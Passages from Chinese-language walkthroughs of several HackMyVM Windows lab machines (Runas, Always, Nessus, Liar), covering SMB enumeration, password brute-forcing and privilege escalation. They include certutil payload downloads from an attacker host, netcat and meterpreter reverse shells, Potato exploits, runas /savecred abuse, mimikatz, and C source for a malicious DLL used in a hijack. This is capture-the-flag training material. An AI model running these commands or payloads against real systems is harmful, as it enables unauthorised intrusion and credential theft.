HackMyVm-Runas ：简单 8.1 信息打点首先进行全端口扫描端口详细信息探测时使用guest账户即可获取信息，说明 SMB 可能允许匿名访问或 guest 权限过高。可以使用smbclient进行匿名登录试试，登录成功！但是没有任何东西ms17-010使用目录扫描、nothing8.2 文件包含利用来到首页点进来index.php发现需要我们传一个file参数，大概率就是文件包含了尝试包含index.php没有效果利用burp进行批量文件包含，字典网上随便找几个筛选内容可以看到这里有一段密文runas-b3a805b2594befb6c846d718d1224557yakuzza解密网站https://www.somd5.com/8.3 远程连接有了账号密码，登录口在哪？看了看之前的端口扫描结果是没有3389端口的，但是现在又有了。。。。。（中途换了换网，ip变成了10.10.10.168）可能是我疏忽了吧，快点来连，搞不好等一下又关了8.4 创建反向shellwindows下载马certutil.exe -urlcache -split -f http://10.10.10.137:8000/shell.exemsf注意监听，同时执行windows机器上的马msfconsole use multi/handler set lhost 10.10.10.137 set payload windows/meterpreter/reverse_tcp run8.5 MSF内核提权全部失败。。。8.6 WinPEAS提权在windows中下载下来，并执行，发现一个最新的漏洞补丁没有打certutil.exe -urlcache -split -f http://10.10.10.137:8000/winPEAS.bat ./winPEAS.bat使用searchsploit检索exp在windwos中的VS打开，打包成exe放上去执行的时候没有任何回显，失败了8.7 土豆提权后面又试过好几种方法，土豆提权，提权失败certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET4.exe GodPotato-NET2.exe -cmd "cmd /c whoami" GodPotato-NET35.exe -cmd "cmd /c whoami" GodPotato-NET4.exe -cmd "cmd /c whoami"8.8 JuicyPotato提权烂土豆提权certutil.exe -urlcache -split -f http://10.10.10.137:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/CLSID/Windows_7_Enterprise/CLSID.list certutil.exe -urlcache -split -f http://10.10.10.137:8000/juicy-potato/Test/test_clsid.batJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\runas\nc.exe 10.10.10.137 4444 -e c:\windows\system32\cmd.exe" -t *执行成功了，但是不能执行命令，提权失败8.9 runas提权在网上找到了这个，使用runas提权https://www.cnblogs.com/kqdssheng/p/18751119在上面这个图片中，可以看到本地管理员账户的凭据已存储在凭据管理器中，并且当前用户是runas！当前的 runas 用户能列出 RUNAS-PC\Administrator 的缓存凭据，具备利用这些凭据实现本地提权的条件Domain:interactive=RUNAS-PC\Administrator 是 “交互式登录的管理员凭据缓存”，意味着系统之前保存过 Administrator 的登录信息（比如用户曾用 Administrator 登录，或通过 runas /savecred 保存过凭据）。虽然无法直接看到明文密码，但 Windows 允许 “在缓存凭据存在时，以该用户身份执行程序”—— 这是提权的关键：8.10 两种具体提权方法使用下面的命令启动一个cmdrunas /savecred /user:RUNAS-PC\Administrator "cmd.exe"此时你执行完这条命令目标机器就会弹出一个cmd窗口，此时你执行命令的时候就是administrator超级管理员，那么我们是不是能够通过上面这条命令执行一个木马，或者nc，来反弹这个shell到kali上？来试试，提权成功！certutil.exe -urlcache -split -f http://10.10.10.137:8000/nc.exe # 从kali中下载nc runas /savecred /user:Administrator "C:\Users\runas\nc.exe 10.10.10.169 4444 -e cmd.exe"8.11 msf内核扫描提升至系统权限可以使用winPACE.exe进行信息收集，在尝试过各种admin提权到系统权限的方式比如multi/recon/local_exploit_suggester MS17-017 exploit/windows/local/ms16_075_reflection 烂土豆提权 土豆提权 多土豆汁提权等等MS16-032最终测试出来windows/local/service_permissions 能够成功提权到system权限， Windows服务权限配置错误漏洞。8.13 抓取明文密码上传mimikatz，获取明文密码！！certutil.exe -urlcache -split -f http://10.10.10.169:8000/mimikatz.exe往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Always ：简单 7.1 信息打点nmap -sS -p- -T4 10.10.10.161 -A使用目录扫描出来一个admin后台界面查看源码发现账号密码信息登录进来发现一个base编码解密ftpuser:KeepGoingBro!!!7.2 登录FTP使用刚刚的账号密码登录ftp 10.10.10.161发现了一个robots.txt，使用下面的命令将它下载下来get robots.txt查看这个robots.txt中的文件管理员的秘密笔记 1）禁用防火墙和 Windows Defender。 2）启用 FTP 和 SSH。 3）启动 Apache 服务器。 4）别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。又得到一个密码always:YouCantFindMe.!.!7.3 远程登录发现密码不对，我们来使用hydra来爆破rdp协议使用enum4linux枚举，看到支持的smb协议，为1.0和2.0/2.1，3.0以上均不支持，让我联想到了永痕之蓝漏洞（MS17-010）enum4linux-ng -A 10.10.10.161 -C含义：-A 是 --all 的缩写，表示执行全量信息收集，包含以下枚举内容：主机基础信息（主机名、工作组 / 域、MAC 地址）；SMB 协议支持情况（支持的 SMB 版本、签名配置）；用户和组列表（本地用户、域用户、内置组等）；共享目录（可访问的 SMB 共享及权限）；操作系统版本（通过 RPC 或 SMB 信息推断）；服务、打印机、系统策略等其他信息。7.4 永痕之蓝利用，很遗憾利用失败利用nxc枚举这两个账号密码always:YouCantFindMe.!.! ftpuser:KeepGoingBro!!!看到ftpuser用户，尝试登录，也不让远程登录7.5 近源攻击这里没找到其他方法，直接登录靶机上传shell吧（近源攻击），这里还需要注意，就是需要修改一下语言为美国的，不然登录不进去7.6 Msf获取反向shellmsfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exemsf上线msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.10.10.137 set lport 4444 run7.6 MSF内核漏扫use multi/recon/local_exploit_suggester使用第一个模块，设置第一个会话，并进行提权##往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Nessus ：简单 6.1 端口扫描6.2 漏洞扫描nmap -sS -p 135,139,445,5985,8834 192.168.53.238 -T4 -A --script=vuln在访问这个端口的时候，提示你需要使用https访问那就使用https访问，没有账号密码，登录不进去6.3 查看smb服务尝试免密连接smb服务，可以正常连接，并且里面有两个PDF看看什么内容My Basic Network Scan_hwhm7q.pdfWeb Application Tests_f6jg9t.pdf发现作者信息，joseexiftool [pdf]6.4 爆破Nessus后台前面已经发现了，smb是可以免密登录的，那么现在就只有nessus爆破了，来到nessus登录界面，抓包，添加爆破的payload根据这些数据包，使用wfuzz进行爆破因为要用到kali中的rockyou.txt字典（也可以将rockyou.txt传到本机windows进行爆破）wfuzz -c -z file,/usr/share/wordlists/rockyou.txt \ -X POST \ -H "Host: 192.168.53.238:8834" \ -H "X-Api-Token: 4c746180-a399-4abd-a9a0-49055fac236f" \ -H "Content-Type: application/json" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36" \ -H "Origin: https://192.168.53.238:8834" \ -H "Referer: https://192.168.53.238:8834/" \ -d '{"username":"jose","password":"FUZZ"}' \ --hc 401,403 \ -f result.txt,raw \ https://192.168.53.238:8834/session得到密码，tequiero当前nessus版本为10.7.3，应该是比较新的，没有什么漏洞，或者漏洞没有公开（去网上搜了下，可能有一个本地提权漏洞，但是exp没有公开）6.5 盗取认证信息来到代理界面，尝试查看源码查看密码，查看失败那么就利用代理，发送数据包到kali中，看看有没有密码出现，kali记得开nckali得到的信息，没有密码信息一个一个切换，当我切换到basic这个内容nc接收到的数据包如下，发现一段密文得到认证信息，解密后就是账号密码nesus:Z#JuXH$ph-;v@,X&mV)得到账号密码，和之前那个靶机一样，需要修改登录的密码，这个已经过期了nxc smb 192.168.53.238 -u nesus -p 'Z#JuXH$ph-;v@,X&mV)'6.6 近源攻击！！按两次Esc键，来到选择账户界面修改你的账号密码修改密码为123456，登录smb，发现什么也没有6.7 远程连接那就来到5985端口，执行命令成功！evil-winrm -i 192.168.53.238 -u nesus -p 1234566.8 反弹shell这里我尝试了各种msf的木马，都被杀软给杀了，无意间使用nc的时候就不会被杀，使用nc进行反弹shell（kali记得开监听）./nc.exe 192.168.53.51 1234 -e cmd6.9 提权6.9.1 local_exploit_suggester提权打开msf（这一步其实很多余，这样子是扫不出来的，基本只有后渗透模块meterperter才能使用）msfconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter） # 目标是Windows，接收nc命令反弹的shell： set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致） set LPORT 1234 # 监听端口（与nc反弹端口一致） run -j # 启动监听，保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块 set session 3 # 设置反弹成功的会话id为3，使用 sessions 即可查看所有的会话id6.9.2 PrivescCheck提权内网常见的提权和信息收集文章参考：https://www.cnblogs.com/Hekeats-L/p/16879325.html工具链接：https://github.com/itm4n/PrivescCheck/releases/tag/2025.10.06-1upload PrivescCheck.ps1 Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck有一个高危的提权漏洞看看文件信息每一项描述如下（如果您精通linux提权的话，将会和linux进行类比）Name服务的 “内部名字”（操作服务时用，比如启停服务）nginx 服务的内部名就是 “nginx”（用systemctl restart nginx时的名字）后续想重启这个服务，要用到这个名字DisplayName服务的 “显示名字”（在 Windows 服务面板里看到的名字，方便你找到它）nginx 在 Linux 里的显示名可能是 “nginx - high performance web server”确认你改的是对的服务，别改错了User这个服务是用 “LocalSystem” 权限运行的（Windows 里的最高权限，比管理员还高）类比 Linux 里用 “root” 用户运行的 nginx 服务提权的关键！服务跑在最高权限，改了它的程序就能拿最高权限ImagePath服务启动时会执行的 “核心 exe 文件路径”（就是你要替换的那个文件）类比 Linux 里 nginx 守护进程的路径/usr/sbin/nginx目标文件！把这个 exe 换成恶意程序就行StartMode服务是 “自动启动” 的（开机或服务崩溃后会自己重启）类比 Linux 里systemctl enable nginx（开机自启）替换文件后不用手动触发，重启机器 / 服务就会执行恶意程序Type服务是 “独立进程”（启动时只跑这个 exe，不依赖其他程序）类比 Linux 里 nginx 是独立进程（`ps auxgrep nginx` 能看到单独的进程）RegistryKey/Path服务在 Windows 注册表中的配置路径（不用管，提权用不上）类比 Linux 里 nginx 的配置文件路径/etc/nginx/nginx.conf（但这里是注册表，不用管）次要信息，不用关注Status服务当前状态（空，因为前面警告没查到）类比 Linux 里systemctl status nginx报错，看不到 “active” 还是 “inactive”后续手动用命令查就行，不影响提权UserCanStart你当前用户 “不能手动启动这个服务”类比 Linux 里普通用户不能systemctl start nginx没关系，能重启机器或杀进程间接触发UserCanStop你当前用户 “不能手动停止这个服务”类比 Linux 里普通用户不能systemctl stop nginx没关系，用taskkill（类比 Linux 的 kill）杀进程就行ModifiablePath你能修改的文件路径 —— 就是上面说的那个要替换的 exe（nessus-service.exe）类比 Linux 里ls -l /usr/sbin/nginx显示你有 w 权限，能改这个文件明确告诉你 “要改哪个文件”IdentityReference拥有这个修改权限的用户 —— 就是你当前的 “NESSUS\nesus” 用户类比 Linux 里ls -l /usr/sbin/nginx显示 “ubuntu rwx”（你的用户有权限）确认 “是你自己有这个改文件的权限”Permissions你的权限是 “完全控制”（能改、能删、能替换这个 exe，想干嘛干嘛）类比 Linux 里的 “rwx” 权限，尤其是 “w”（写入）权限 总结一下：你当前的nesus用户，能完全控制一个叫Tenable Nessus的服务 —— 这个服务是用 Windows 最高权限（LocalSystem，类比 Linux root）运行的，启动时会执行nessus-service.exe。而且这个服务是开机自动启动的，你只要把nessus-service.exe换成恶意程序，下次服务启动（重启机器 / 杀进程），恶意程序就会用最高权限跑起来 —— 和你在 Linux 里替换 root 运行的/usr/sbin/nginx、重启后拿 root 权限，完全一样。cd "C:\Program Files\Tenable\Nessus\" dir原来是可以利用直接替换这个应用程序进行提权，但是这里，杀软会查杀掉我们的msf马，要么你有能力过这个windows defender当然也可以使用nc，但是nc是一个应用程序，需要选用参数，而不是直接执行，就能上线msf或者kali的nc的，需要使用批处理也就是.bat# kali echo "C:\Users\nesus\Documents\nc.exe 192.168.53.51 4444 -e cmd.exe" > nessus-service.bat # evil-winrm upload nessus-service.bat "C:\Program Files\Tenable\Nessus\nessus-service.exe"这里漏掉了一个关键（你需要杀死它的进程，让服务自动重启）我们使用Stop-Process强制重启服务的时候报了一个错误：拒绝访问（Access is denied）Stop-Process -Id (Get-Process -Name "nessus-service").Id -Force遇到 “Access denied” 是因为nessus-service进程以LocalSystem权限运行，低权限用户无法直接杀死。如何解决？尝试更底层的taskkill！taskkill是 Windows 原生的进程杀死命令，权限处理和Stop-Process不同，先试一次：taskkill /f /im nessus-service.exe照样也是拒绝访问。重启计算机也没用，那么就换一种方法，dll劫持！dll劫持！6.10 DLL劫持6.10.1 什么是 DLL 劫持？（类比 Linux）1. 基础定义DLL（Dynamic Link Library，动态链接库）是 Windows 里的 “共享代码文件”，类似 Linux 的.so文件（Shared Object）。很多程序（比如服务、软件）运行时会主动加载依赖的 DLL 文件（比如调用 DLL 里的函数）。DLL 劫持的本质是：攻击者替换 / 插入一个恶意 DLL 文件，让高权限运行的目标程序（比如 LocalSystem 权限的服务）“误加载” 我们的恶意 DLL，从而执行恶意代码（相当于 Linux 里用LD_PRELOAD强制 root 进程加载恶意.so文件）。2. 类比 Linux 场景你在 Linux 里想提权时，可能会用LD_PRELOAD=/tmp/malicious.so /usr/bin/root_program，强制 root 运行的root_program加载你的恶意.so文件，.so里的代码会以 root 权限执行。Windows DLL 劫持和这个逻辑完全一样：让 LocalSystem 权限的Tenable Nessus服务，加载你写的恶意legacy.dll，DLL 里的代码会以 LocalSystem 权限执行。6.10.2 DLL 劫持提权过程1、查权限icacls "C:\Program Files\Tenable\Nessus\*.dll" 是 Windows 中用来查看指定目录下所有dll文件 / 子目录权限的命令，作用类似 Linux 里的 ls -l /path/*.dll（查看某个目录下所有文件的权限详情）。icacls "C:\Program Files\Tenable\Nessus\*.dll"为什么要使用这条命令？确认你当前用户（nesus）对服务依赖的 DLL 文件（比如legacy.dll）有写入 / 替换权限。从之前的权限结果看，nesus对这些 DLL 有F（完全控制）权限 —— 相当于 Linux 里用ls -l /usr/lib/root_program_dep.so看到普通用户有w权限，满足 “能替换文件” 的前提。权限表，和linux差不多，这里多了个修改还有删除，linux中只有rwx符号权限说明对应操作F完全控制读取、写入、执行、删除、修改属性M修改写入、删除（需配合F）RX读取和执行查看内容、运行程序R只读查看内容W写入修改内容（需目录权限）D删除删除文件或子目录2、编写恶意 DLL 代码在网上找到一个脚本，这是一个基础的恶意 DLL，核心逻辑在DLLMain函数里：/* DLL hijacking example author: @cocomelonc */ #include BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: // 程序加载DLL时触发（关键分支） system("cmd.exe /k net localgroup administrators nesus /add"); // 恶意命令：把nesus加入管理员组 break; case DLL_PROCESS_DETACH: // 其他分支（进程卸载、线程创建/销毁）暂不用管 break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } return TRUE; }关键解释：DLLMain是 DLL 的 “入口函数”，类似 Linux.so文件的_init函数 —— 目标程序（Nessus 服务）加载 DLL 时，会自动调用DLLMain，并触发DLL_PROCESS_ATTACH分支。恶意命令net localgroup administrators nesus /add：把nesus加入管理员组（这里是示例，实际可写反弹 shell 命令，拿到 LocalSystem 权限）。Linux 类比：写一个恶意.so文件，在_init函数里执行system("usermod -aG sudo ubuntu")，让 root 进程加载时把普通用户加入 sudo 组。3、编译恶意 DLL（生成 Windows 能识别的格式）在 Kali 里用mingw编译 C 代码，生成 Windows 可加载的 DLL 文件：# kali x86_64-w64-mingw32-gcc exp.c -shared -o legacy.dllx86_64-w64-mingw32-gcc：Windows 交叉编译器（生成 64 位 Windows 程序，需和目标系统位数匹配）；-shared：生成 “共享库”（即 DLL 文件，对应 Linux 的.so）；-o legacy.dll：输出文件名为legacy.dll（必须和目标服务依赖的 DLL 同名，否则服务找不到）。4、备份原 DLL + 上传替换（避免服务崩溃 + 植入恶意文件）# evil-winrm cd "C:\Program Files\Tenable\Nessus" mv legacy.dll legacy_beifen.dll # 备份文件 upload legacy.dll # 上传你kali编译的dll文件备份原 DLL：legacy.dll是 Nessus 服务的依赖文件，直接删除会导致服务崩溃，备份后可回滚（类似 Linux 里cp /usr/lib/libnginx_dep.so /tmp/）；上传替换：让服务下次加载legacy.dll时，加载的是你的恶意 DLL（类似 Linux 里cp /tmp/malicious.so /usr/lib/libnginx_dep.so）。5、重启虚拟机（触发服务加载恶意 DLL）最后重启目标机，Nessus 服务会随系统开机启动 —— 启动时会自动加载依赖的legacy.dll（此时已被替换成恶意 DLL）：服务以LocalSystem（Windows 最高权限，类比 Linux root）启动；加载恶意legacy.dll，触发DLLMain的DLL_PROCESS_ATTACH分支；执行net localgroup administrators nesus /add，把nesus加入管理员组（实际可改为反弹 shell 命令，拿到 SYSTEM 权限）；重启后，nesus已拥有管理员权限，提权成功。6.10.3 DLL 劫持的核心利用条件和 Linux.so劫持的条件类似，DLL 劫持能成功，必须同时满足以下 4 个条件（你的场景全部满足）：1. 目标程序（服务 / 软件）以高权限运行比如你的Tenable Nessus服务以LocalSystem权限运行（类比 Linux 里 root 运行的nginx）。若目标程序是普通用户权限，即使劫持成功，也只能拿到普通权限，无法提权。2. 你对目标程序加载的DLL 文件有写入 / 替换权限你的icacls结果显示，nesus对legacy.dll有F（完全控制）权限，能备份、删除、替换该 DLL（类比 Linux 里普通用户对/usr/lib/libnginx_dep.so有w权限）。若只有只读权限（RX），无法替换 DLL，劫持失败。3. 目标程序会主动加载该 DLL 文件legacy.dll是Tenable Nessus服务的 “依赖 DLL”—— 服务启动时必须加载它才能正常运行（类比 Linux 里nginx必须加载libnginx_dep.so）。若目标程序不加载该 DLL，即使替换了也没用（比如替换一个无关的 DLL 文件）。4. 恶意 DLL 能被目标程序成功加载恶意 DLL 的格式要正确（比如 32 位 / 64 位和目标程序匹配，你用x86_64编译对应 64 位系统）；若目标程序需要 DLL 导出特定函数（比如LoadLibrary调用的函数），恶意 DLL 需包含这些导出函数（你的示例是基础DLLMain，满足简单加载需求）。类比 Linux 里恶意.so需符合 ELF 格式，否则无法被nginx加载。6.10.4 总结找到一个 “高权限运行、且依赖的 DLL 你能替换” 的程序（比如服务），用恶意 DLL 替换原 DLL，让高权限程序执行恶意代码，从而拿到高权限。往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 linux 信息收集，提权一键梭哈神器x-waf，一个基于fuzz的waf绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【oscp】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略sql注入中各种waf的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的waf防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种waf绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Liar ：简单 5.1 信息打点nmap -sS 192.168.53.131 -p- -T4这里有一个用户名nica使用nmap进行详细的端口扫描nmap -sS 192.168.53.131 -p 80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677 -T4 -A5.2 enum4linux枚举使用enum4linux-ng枚举目标系统信息，smb服务器开启enum4linux-ng -A 192.168.53.131 -C尝试免密登录，登录失败了smbclient -L //192.168.53.131/ -N这个免密登录 -N参数就代表着： “空用户名 + 空密码” 的身份，在 Windows 系统中对应的就是 anonymous 用户也就是相当于你执行了命令 smbclient -L \192.168.56.114 -U anonymous5.3 nxc内网渗透使用smb爆破nxc smb 192.168.53.131 -u nica -p /usr/share/wordlists/metasploit/burnett_top_1024.txt爆破结果nica:hardcore，使用账号密码登录smb服务器从当前操作结果来看，nica 用户虽然凭据有效（能登录 IPC$），但权限较低，无法访问 C$、ADMIN$ 等敏感共享5.4 远程连接5985端口开启 ，使用windows版本的ssh连接此服务，可以看到能正常执行命令，登录成功evil-winrm -i 192.168.53.131 -u nica -p hardcore看看有哪些用户，大概率就是akanksha用户继续获得其他信息了继续爆破nxc smb 192.168.53.131 -u akanksha -p /usr/share/wordlists/rockyou.txt这也是一个低权限用户这里就连接不上了evil-winrm -i 192.168.53.131 -u akanksha -p sweetgirl5.5 RunasCs提权那么我们使用工具https://github.com/antonioCoco/RunasCs以指定用户权限执行命令*Evil-WinRM* PS C:\Users\nica> upload RunasCs.exe Info: Uploading /root/Desktop/RunasCs.exe to C:\Users\nica\RunasCs.exe Data: 68948 bytes of 68948 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\nica> dir Directorio: C:\Users\nica Mode LastWriteTime Length Name ---- ------------- ------ ---- d-r--- 9/15/2018 9:12 AM Desktop d-r--- 9/26/2023 6:44 PM Documents d-r--- 9/15/2018 9:12 AM Downloads d-r--- 9/15/2018 9:12 AM Favorites d-r--- 9/15/2018 9:12 AM Links d-r--- 9/15/2018 9:12 AM Music d-r--- 9/15/2018 9:12 AM Pictures d----- 9/15/2018 9:12 AM Saved Games d-r--- 9/15/2018 9:12 AM Videos -a---- 7/14/2024 10:49 PM 51712 RunasCs.exe -a---- 9/26/2023 6:44 PM 10 user.txt *Evil-WinRM* PS C:\Users\nica> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.53.51:4567 [+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\Desktop: Service-0x0-2922e6$\Default [+] Async process 'C:\Windows\system32\cmd.exe' with pid 2496 created in background.> nc -lvnp 4567 listening on [any] 4567 ... connect to [192.168.53.51] from (UNKNOWN) [192.168.53.131] 49674 Microsoft Windows [Versi�n 10.0.17763.107] (c) 2018 Microsoft Corporation. Todos los derechos reservados. C:\Windows\system32>成功弹回了shellC:\Users>whoami /groups whoami /groups INFORMACI�N DE GRUPO -------------------- Nombre de grupo Tipo SID Atributos ============================================ ============== ============================================== ======================================================================== Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado WIN-IURF14RBVGV\Idministritirs Alias S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado NT AUTHORITY\INTERACTIVE Grupo conocido S-1-5-4 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado INICIO DE SESI�N EN LA CONSOLA Grupo conocido S-1-2-1 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado NT AUTHORITY\Esta compa��a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado NT AUTHORITY\Cuenta local Grupo conocido S-1-5-113 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado NT AUTHORITY\Autenticaci�n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado Etiqueta 